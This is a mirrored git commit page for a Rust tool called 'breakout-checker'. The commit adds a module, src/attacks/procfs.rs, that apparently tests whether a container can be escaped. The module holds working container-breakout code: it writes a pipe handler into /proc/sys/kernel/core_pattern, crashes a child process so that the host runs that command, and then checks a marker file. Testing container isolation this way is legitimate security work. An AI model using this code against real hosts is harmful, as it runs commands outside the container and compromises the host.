mirror of
https://github.com/mii443/breakout-checker.git
synced 2025-08-22 15:15:26 +00:00
add procfs core_pattern breakout
This commit is contained in:
mii
1
.gitignore
vendored
Normal file
1
.gitignore
vendored
Normal file
@ -0,0 +1 @@
|
|||||||
|
/target
|
||||||
46
Cargo.lock
generated
Normal file
46
Cargo.lock
generated
Normal file
@ -0,0 +1,46 @@
|
|||||||
|
# This file is automatically @generated by Cargo.
|
||||||
|
# It is not intended for manual editing.
|
||||||
|
version = 3
|
||||||
|
|
||||||
|
[[package]]
|
||||||
|
name = "bitflags"
|
||||||
|
version = "2.6.0"
|
||||||
|
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||||
|
checksum = "b048fb63fd8b5923fc5aa7b340d8e156aec7ec02f0c78fa8a6ddc2613f6f71de"
|
||||||
|
|
||||||
|
[[package]]
|
||||||
|
name = "breakout-checker"
|
||||||
|
version = "0.1.0"
|
||||||
|
dependencies = [
|
||||||
|
"nix",
|
||||||
|
]
|
||||||
|
|
||||||
|
[[package]]
|
||||||
|
name = "cfg-if"
|
||||||
|
version = "1.0.0"
|
||||||
|
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||||
|
checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd"
|
||||||
|
|
||||||
|
[[package]]
|
||||||
|
name = "cfg_aliases"
|
||||||
|
version = "0.2.1"
|
||||||
|
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||||
|
checksum = "613afe47fcd5fac7ccf1db93babcb082c5994d996f20b8b159f2ad1658eb5724"
|
||||||
|
|
||||||
|
[[package]]
|
||||||
|
name = "libc"
|
||||||
|
version = "0.2.161"
|
||||||
|
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||||
|
checksum = "8e9489c2807c139ffd9c1794f4af0ebe86a828db53ecdc7fea2111d0fed085d1"
|
||||||
|
|
||||||
|
[[package]]
|
||||||
|
name = "nix"
|
||||||
|
version = "0.29.0"
|
||||||
|
source = "registry+https://github.com/rust-lang/crates.io-index"
|
||||||
|
checksum = "71e2746dc3a24dd78b3cfcb7be93368c6de9963d30f43a6a73998a9cf4b17b46"
|
||||||
|
dependencies = [
|
||||||
|
"bitflags",
|
||||||
|
"cfg-if",
|
||||||
|
"cfg_aliases",
|
||||||
|
"libc",
|
||||||
|
]
|
||||||
1
src/attacks/mod.rs
Normal file
1
src/attacks/mod.rs
Normal file
@ -0,0 +1 @@
|
|||||||
|
pub mod procfs;
|
||||||
40
src/attacks/procfs.rs
Normal file
40
src/attacks/procfs.rs
Normal file
@ -0,0 +1,40 @@
|
|||||||
|
use std::io::{Read, Write};
|
||||||
|
|
||||||
|
use nix::{
|
||||||
|
libc::SIGCHLD,
|
||||||
|
sched::{self, CloneFlags},
|
||||||
|
sys::wait::waitpid,
|
||||||
|
};
|
||||||
|
|
||||||
|
///
|
||||||
|
/// 1. write "|$host_root/cmd" >> /proc/sys/kernel/core_pattern
|
||||||
|
/// 2. create process and segv
|
||||||
|
///
|
||||||
|
pub fn procfs_breakout(host_root: &str) -> Result<bool, Box<dyn std::error::Error>> {
|
||||||
|
let mut core_pattern = std::fs::File::options()
|
||||||
|
.write(true)
|
||||||
|
.open("/proc/sys/kernel/core_pattern")?;
|
||||||
|
|
||||||
|
core_pattern.write_all(format!("|{}/cmd", host_root).as_bytes())?;
|
||||||
|
|
||||||
|
let mut stack = [0u8; 1024];
|
||||||
|
let pid = unsafe {
|
||||||
|
sched::clone(
|
||||||
|
Box::new(|| {
|
||||||
|
std::ptr::null_mut::<i32>().write(42);
|
||||||
|
127
|
||||||
|
}),
|
||||||
|
&mut stack,
|
||||||
|
CloneFlags::empty(),
|
||||||
|
Some(SIGCHLD),
|
||||||
|
)?
|
||||||
|
};
|
||||||
|
|
||||||
|
let _ = waitpid(pid, None);
|
||||||
|
|
||||||
|
let mut breakout = std::fs::File::open("/breakout")?;
|
||||||
|
let mut buf = String::default();
|
||||||
|
breakout.read_to_string(&mut buf)?;
|
||||||
|
|
||||||
|
Ok(buf.contains("true"))
|
||||||
|
}
|
||||||
Reference in New Issue
Block a user